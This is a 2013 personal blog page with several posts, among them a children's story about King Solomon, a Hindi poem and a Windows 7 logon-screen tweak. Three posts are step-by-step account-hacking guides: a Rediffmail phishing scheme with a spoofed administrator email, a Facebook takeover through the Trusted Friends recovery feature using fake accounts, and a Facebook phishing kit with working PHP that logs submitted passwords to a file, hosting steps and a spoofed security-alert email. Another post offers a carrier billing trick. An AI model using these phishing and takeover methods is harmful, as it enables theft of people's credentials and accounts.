Tuesday, 28 May 2013

How to hack a rediff account

Hi FRIENDS TODAY IAM GOIN TO TELL YOU A VERY SPECIAL TRICK....HOW TO HACK A REDIFFMAIL ACCOUNT 

Hacking rediffmails is not that easy coz the site has very tight security. so u can't use any softwares to hack emails.

Step1:-Register an website at focusindia.com.it is free of cost.i assume that u have created ur account with ur correct emails address.ur account name is www.youraccountname.focusindia.com.now enter ur account name in the field where there is "EnterYouraccountnamehere" in the thishtml file if u dont know how to add than go to view and open source code.after you have done save it as Rediffmail.htm.

Step2:-the next thing is that u have to create a new account with rediffmail to send this file to ur victim.it must as activationincharge@rediffmail.com or something like that ur administrator of reidffmails.now compose the message with subject "RediffmailActivationform" and attach the file Rediffmail.htm file and sent it ur victim.when victim opens the file he thinks that the mail is from rediffmail administrator and he enter info in the form.you will get his username and password at the email address that u have provided in the www.youraccountname.focusindia.com

Please dont delete any important emails after u get his/her password.thats all for now and i am wating for ur feedback.if u have any other trick to hack rediffmails than let me know about it.

Monday, 27 May 2013

Hack a facebook account with three fake id's bye 8 steps

hello friends, today iam going to tell you very special trick,
1-    So now here we are going to the misuse this trick to Hack Facebook Account. So now you have to just create 3 the fake Fb accounts then have to send a friend request’s  from those 3 fake accounts to A victim. SO Victim must accept those The friend request OR Contact with your Friend who give you the security code. Now we can use   "THE Three Trusted Friend" feature’s to reset A victims' Face book account password.

Important Note: The 3 fake account’s must be the  7 day older, then otherwise this Facebook Hack will be not work

After this, so now you are able to the hack your Victim Friend’s Face book Account easily so now just follow These steps given below

2-    Now click on The Forgot Facebook Password button like below. Now Facebook system will show you the three solutions to recover your or Victim  password as the shown below
3-    So Two things are

1. Email,phone or Facebook username
2. Your name and A friend’s name

If you know anything so enter  there or GO the victim profile link so just copy the username like min

Facebook.com/prithviman45

so now copy just prithviman45
and paste in Email,phone or Facebook username
4-Now After that,yoy click on the No Longer Have Access to These 

5-Then, you can enter a New Email Address which has not to be the used with Any Facebook Account which earlier and then click on a Submit button to proceed to a next step
6-So now You will be a asked for a security question answer. Then If you know the answer then it’s perfect and if you don’t know then fill it with wrong answers 3 times
7-After these submission or giving the wrong answers, then Facebook Security will show the TRUSTED FRIENDS feature for recover a account
Then Click on a Continue button

Then, it will ask you to the select 3 Friends (Now select Friend or your 3 Fake Account’s Name’s) from a shown list and then  click to the  Continue button after each time you select the selection
After the above all step, then Facebook have to sent the security codes to a each of the 3 accounts which you have selected

Then, Now Login to each of a 3 accounts or ask to friend and note this security’s codes manually and then the fill them in a proper manner ( If they were not found in  a Inbox then check a Spam Folder Also 

8-Now, then Password Reset Email has been sent to a new Email provided by you given the id previous

That’s final it! You are done the successfully Hacked a victim Account, Now, you have to the  access to your  Friends and Victim Account .

  so enjoy .....don't missuse this trick for your personal matter


Tuesday, 21 May 2013

How to use 2g net from a 3g speed for docomo users

1. Simple trick is here if u recharge to lowest
3G Recharge before the
48 recharge it should give
u 3g speed , In short recharge it with
smallest 3G voucher and than with
2g plan you will get 3g speed. FORE MORE dial *141#
and select 3g data plan select lowest
data plan and use it Try it and reply Enjoy guys 2.Another trick for 3g speed in 2g Plan Just do this below settings and you are done with the speed plans.
1. First activate your Tata Docomo 2G Internet Plan Of 15 rs (500MB)
2. And then make your balance to 1-2 rs
3. Now dial *141# and then select “3G Internet Plans” and select your state
4. Now activate lowest 3G Internet plans like of 11 rs or 9 rs
5. Now you will get the message of no balance so we can’t activate this 3G plan
6. Just ignore this message and now check your internet downloading speed of Tata Docomo 3G
7. Enjoy 3G Speed In Old 2G Internet Plans In Tata Docomo
Note :This Tricks will only work where their is Tata Docomo 3G networks. Will work where you get the Tata Docomo 3G Networks
Here Is step By step Procedure..
Send:*141*1# Receive:3G Packs- Choose your region (Available in select towns):
1.UPW 2.PUN 3.HAR 4.GUJ 5.RAJ 6.MP 7.KER 8.KAR 9.MAH Send:2 Receive:1.10MB free 3G @Rs.11
2.25MB Free 3G @ Rs.21
3.50MB Free 3G @ Rs.39
4.100MB Free 3G @ Rs.90
5.250MB Free 3G @ Rs.201
6.500MB Free 3G @ Rs.351
Send:1 Receive:Hi! You have requested for a pack that is valid for 1 day. Select 1 to activate or select 2 to go back to the main menu 1.Activate 2.Back Send:1 Receive:Hi! We have received your request. This will be activated within 2 hours.

 

Sunday, 19 May 2013

How To Hack A Facebook Account By Phishing

Dear friends today  I will show you how you can create fake facebook log-in page and then fool     your victim to put his username and password in it so that you can get his account password.

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.

To create phish.php:
Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/


Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.

Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.



Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.


support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US


If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file.
EX-

Thursday, 16 May 2013

Simple 6 steps for changing your window logon screen background for window 7

JUST FOLLOW THESE STEPS-
Add caption


1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.
3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.
4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.
5. Double-click on OEMBackground and set the Value Data to 1.
6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.
I hope you like this trick. Just try out and give your feedback!

Monday, 22 April 2013

Story Of Very Wise King


Very Wise King
                                                 
A legend retold.
Topics:
Wisdom
Target Audience:Grades 1-6 (Ages 6-12)



A
 long time ago, there lived a very, very wise King. He was so wise he knew the ways of most everything. He knew of animals, birds, fish, and trees. And he taught people from all over the world about these.
Now one breezy day, a tiny bee lost her way, and flew right into the King’s beautiful palace. The little bee begged the King, “Please, let me live, and I will serve you some other day.”
The King was amused to think a tiny bee could one day serve such a mighty king. He released the bee and said, “Go, be on your way, for I need nothing more from you today.”

Many days later, the people of the kingdom filled the palace yard. A queen was coming to visit from a a far away land. She heard many people claim this king was very wise. She had to know for sure that they were not all just lies. Finally, she arrived and came up to the King’s lofty throne. She offered her friendship and wonderful gifts, but finally the queen made her real purpose known.
“I hear you are wise,” she said. “You are wiser than the rest. Would you be willing to put your wisdom to a test?”

The King agreed, and she did her best, with riddles, tricks, and difficult tests. In fact, she became quite a bothersome pest.
One day she gave the King a large gemstone, and through the very middle was a tiny twisty hole. “See if you can put a thread through this gem,” she challenged the King with a devious grin. But the King asked a silkworm to climb through the hole, which is not a big problem for a tiny silkworm, you know. And as it did, a thin thread of silk followed the silkworm all the way through.
Another time, the queen tested his skills by filling a room with fifty boys and fifty girls. They were all dressed alike so the King could not tell, if one was a boy or another a girl. “See if you can pick out the boys from the girls. Then I will know you are the wisest in the world.”
But the King knew exactly how he could tell. He had his servants bring bowls of water for each child. Then he told the children not to make this a race, but he would like all of them to wash off their face. The boys splashed and splashed at the very word go, but the girls daintily dipped their fingers into the bowl. By this the King could very easily tell, who was a boy and who was a girl.
Now the queen was quite angered at the King’s show of wisdom, and all the more determined to find a way to trick him. “We must have a test,” she challenged her advisors, “To prove this king’s a fool, not to prove he is wiser!”
So they came up with a plan that would surely not fail. It indeed was a test to make the others look pale. They ordered the queen’s craftsmen to make ninety-nine flowers, fake through and through, but looking so real. When finished, even the queen could not tell they were fake. She was sure the King would make the very same mistake. And then from the King’s garden, she took just one real flower, and cleverly hid it among all the others.
“Tomorrow will be a wonderful day," the queen said, “because we will make the wise King look foolish instead. Yes, during the party that is held in his honor, we will test the King then, to find his ‘real’ flower.”
The next day, the people gathered from over the land to attend the party and worship their king. Then right after the meal the queen stood and spoke. She grabbed the attention of all of the good folk.
“Listen everyone, I have something to say. Just one more test to give the King today. My craftsmen created many beautiful flowers. They all look so real to test the king’s powers. Ninety-nine are fake, but one is real somewhere. Can the King find that one, if only he dare?”
The King, not wanting to be fooled by this queen, accepted the challenge she handed to him. He sniffed at the flowers, but they all smelled so sweet, and all of the flowers were as soft as could be. The flowers were all so beautiful to see, now which one could the real flower be? The King hesitated, and the people did wonder, “Could our king not be so wise and so great? Surely he could tell a real flower from fake.”
The King became a bit perplexed and did not know what to do next. Suddenly, he heard a faint buzzing sound, something was there buzzing around. It was the tiny little bee he saved many days before. “I am here at your service, here I am sir. I am here to repay the kindness you gave, on that one breezy day.”
The tiny bee quickly flew over the flowers and in no time at all found the one searching for, the one with the honey, so sweet and so pure. The King stooped down and plucked the flower. “Here is the one, no need to look further.” He handed it to the queen to see. And the craftsmen confirmed, it was the real one indeed. Finally, the queen had to give in and admitted this king was truly the wisest there ever had been.
And yes he truly was, for this was King Solomon, the son of David. When Solomon prayed for wisdom instead of riches, God said, "I will do what you have asked. I will give you a wise and discerning heart, so that there will never have been anyone like you, nor will there ever be. Moreover, I will give you what you have not asked for—both riches and honor—so that in your lifetime you will have no equal among kings." (1 Kings 3:12 -13)
 

poem in hindi

पूर्व चलने के बटोही बाट की पहचान कर ले।
पुस्तकों में है नहीं
छापी गई इसकी कहानी
हाल इसका ज्ञात होता
है औरों की जबानी
अनगिनत राही गए
इस राह से उनका पता क्या
पर गए कुछ लोग इस पर
छोड़ पैरों की निशानी
यह निशानी मूक होकर
भी बहुत कुछ बोलती है
खोल इसका अर्थ पंथी
पंथ का अनुमान कर ले।
पूर्व चलने के बटोही बाट की पहचान कर ले।
यह बुरा है या कि अच्छा
व्यर्थ दिन इस पर बिताना
अब असंभव छोड़ यह पथ
दूसरे पर पग बढ़ाना
तू इसे अच्छा समझ
यात्रा सरल इससे बनेगी
सोच मत केवल तुझे ही
यह पड़ा मन में बिठाना
हर सफल पंथी यही
विश्वास ले इस पर बढ़ा है
तू इसी पर आज अपने
चित्त का अवधान कर ले।
पूर्व चलने के बटोही बाट की पहचान कर ले।
है अनिश्चित किस जगह पर
सरित गिरि गह्वर मिलेंगे
है अनिश्चित किस जगह पर
बाग वन सुंदर मिलेंगे
किस जगह यात्रा खतम हो
जाएगी यह भी अनिश्चित
है अनिश्चित कब सुमन कब
कंटकों के शर मिलेंगे
कौन सहसा छू जाएँगे
मिलेंगे कौन सहसा
पड़े कुछ भी रुकेगा
तू ऐसी आन कर ले।
पूर्व चलने के बटोही बाट की पहचान कर ले।